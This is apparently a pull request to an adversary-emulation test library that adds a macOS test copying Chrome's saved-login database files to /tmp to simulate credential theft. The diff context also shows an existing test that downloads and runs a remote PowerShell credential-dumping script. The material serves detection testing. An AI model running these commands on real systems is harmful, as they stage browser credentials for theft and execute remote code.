### PR TITLE
Adding T1555.003 Test 14  - Chrome Login Data Access (MacOS)

### DIFF
--- a/atomics/T1555.003/T1555.003.yaml
+++ b/atomics/T1555.003/T1555.003.yaml
@@ -370,3 +370,18 @@ atomic_tests:
       iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Sharpweb.ps1')
       Invoke-Sharpweb -command "all"
     name: powershell
+- name: Simulating Access to Chrome Login Data - MacOS
+  description: |
+    This test locates the Login Data files used by Chrome to store encrypted credentials, then copies them to the temp directory for later exfil. 
+    Once the files are exfiltrated, malware like CookieMiner could be used to perform credential extraction. 
+    See https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/ . 
+  supported_platforms:
+  - macos
+  executor:
+    command: |
+      cp ~/Library/"Application Support/Google/Chrome/Default/Login Data" "/tmp/T1555.003_Login Data"
+      cp ~/Library/"Application Support/Google/Chrome/Default/Login Data For Account" "/tmp/T1555.003_Login Data For Account"
+    cleanup_command: |
+      rm "/tmp/T1555.003_Login Data" >/dev/null 2>&1
+      rm "/tmp/T1555.003_Login Data For Account" >/dev/null 2>&1
+    name: sh


### PR DESCRIPTION
**Details:**
This test copies Chrome's "Login Data" and "Login Data For Account" files to the tmp directory, simulating the tactics that an adversary might use to exfiltrate credentials to later be harvested offline with malware/tools like CookieMiner. 

**Testing:**
Tested on MacOS Catalina.
